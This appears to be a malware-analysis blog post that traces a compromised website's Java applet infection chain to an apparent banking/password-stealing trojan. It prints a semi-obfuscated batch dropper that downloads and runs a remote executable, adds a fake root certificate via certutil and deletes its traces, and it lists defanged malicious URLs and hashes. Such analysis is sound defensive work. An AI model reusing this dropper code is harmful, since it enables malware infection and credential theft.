Yesterday I found that a local website had been compromised and embedded with malicious code. Once a user visits the website and allows the Java applet to run, the malware is downloaded and installed.
The picture above shows that you will be prompted to allow the Java plug-in in order to use some 'features' on this website. Let's take a look at the webpage source code. The red-highlighted part in the picture below is a Windows batch command that drops a VBScript file, which in turn downloads another piece of malware (a Windows executable) from an Israeli website. That website has also possibly been compromised.
As we can see, the main page of the website has been embedded with extra code. At the top of it is a call to the Java applet (Dantas.jar). This Java applet is what runs the Windows batch command. Below is the Java applet code.
If the Windows batch command executes successfully, it saves the VBScript code into the Windows temporary directory as eden.vbs. It then runs eden.vbs, which downloads and runs the malware executable.
The bottom of the website has also been embedded with some scam pharma (Viagra) hyperlinks.
Now we need to take a closer look at the PE file downloaded from the following link:
hxxp://www.kanibar.co.il/tmp/DSC12012PDF.exe (a1d2a281980fdd75546557a9ba6de0a6)
The PE file is actually an SFX archive. It contains several files, including a certificate from the malware author.
FileName | MD5 | Desc.
--- | --- | ---
certadm.dll | AED39116FE12C5550975043DA1D1B244 | Microsoft Certificate Services Admin
certnew.cer | 2B742FEB1883EE5CB418B1CBAB145A7D | Fake Security Certificate
certutil.exe | 711DB2EF10B6C2AB2080698AEC6C6D08 | Cert Util.exe
givetome.exe | 6D2C398E03397C9D089EDC0F00AB3FCB | http://noeld.com/programs.asp
jeovahjireh.exe | 0B2BF362548B244477D9FFB613AF54D4 | Malware

The only suspicious file is 'jeovahjireh.exe', so we need to take a closer look at it. The file is compressed with UPX 3.07. The PE file is actually a kind of Bat2Exe file binder; inside it is a Windows batch script.
@shift
@break off
echo 274087083240932840982409820482048282830482429384234932408270983238 > %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
set inf=0
set exe="%temp%\msavc.exe"
if exist %temp%\%USERNAME%.dll goto mapa
> %temp%\%USERNAME%.dll echo y
:mapa
%temp%\givetome.exe http://216.17.106.2/~comprapr/KLJAWEIUIJN92838921JAS.JIP "%exe%"
del "%temp%\leiame.txt"
ECHO -------------------------------------------------------------------------------
%tmp%\certutil.exe -addstore root %tmp%\certnew.cer
certutil -addstore root %tmp%\certnew.cer
cmd.exe /c "%exe%"
del /F %tmp%\certnew.cer
del /F %tmp%\certadm.dll
del /F %tmp%\certutil.exe
del /F %tmp%\givetome.exe
echo fhsdkjhfkjdsfkjdsfhdskhfjkhjkhdsjkhfkjsdhfkjsdhfkjdsfds > %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat
. . .
echo jfdeidhpjrher093u40ruhdfuhisufsd90fu43u90urifhdsjfsiofkjsofsdjfsdfdjhfsd >> %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat
echo adgfsvgf354bvt2435tvb234rtg234vtrvc5234tvc254 >> %temp%\xhuahushbnnmf.dat.dat
The code is a bit lengthy and semi-obfuscated. Most of it is useless junk; I have cut some of the junk code out above.
What the Windows batch script actually does is download another PE file from the following URL:
hxxp://216.17.106.2/~comprapr/KLJAWEIUIJN92838921JAS.JIP
The *.jip file is saved in the temp directory as 'msavc.exe'. After that, the script adds the 'certnew.cer' certificate to the infected machine's root certificate store (via certutil -addstore root).
Then it executes 'msavc.exe' using cmd.exe. All the bundled files are deleted afterwards (certnew.cer, certadm.dll, certutil.exe, givetome.exe).
Now we need to take a look at the newly downloaded PE file (B99A6FF84E4404488D789F5D56593735), named 'msavc.exe'. This file is packed with UPX 3.08 and written in Borland Delphi.
Based on the VirusTotal result, the PE file is possibly a trojan stealer, password stealer or banking trojan, i.e. it steals user information from victim PCs.
As we can see in the network traffic, it tries to access the following URL with a parameter:
hxxp://www.snv1r1.net/2k12v3r1/71164BED09340ABE6D4C69BD.php?op=7A0B4EED571641ED7E277EBE704E09DA3C5D3E
The domain name is still active, but the content at the given URL is no longer available.
Several mutexes are also created by this malware. It also crawls into several sensitive directories.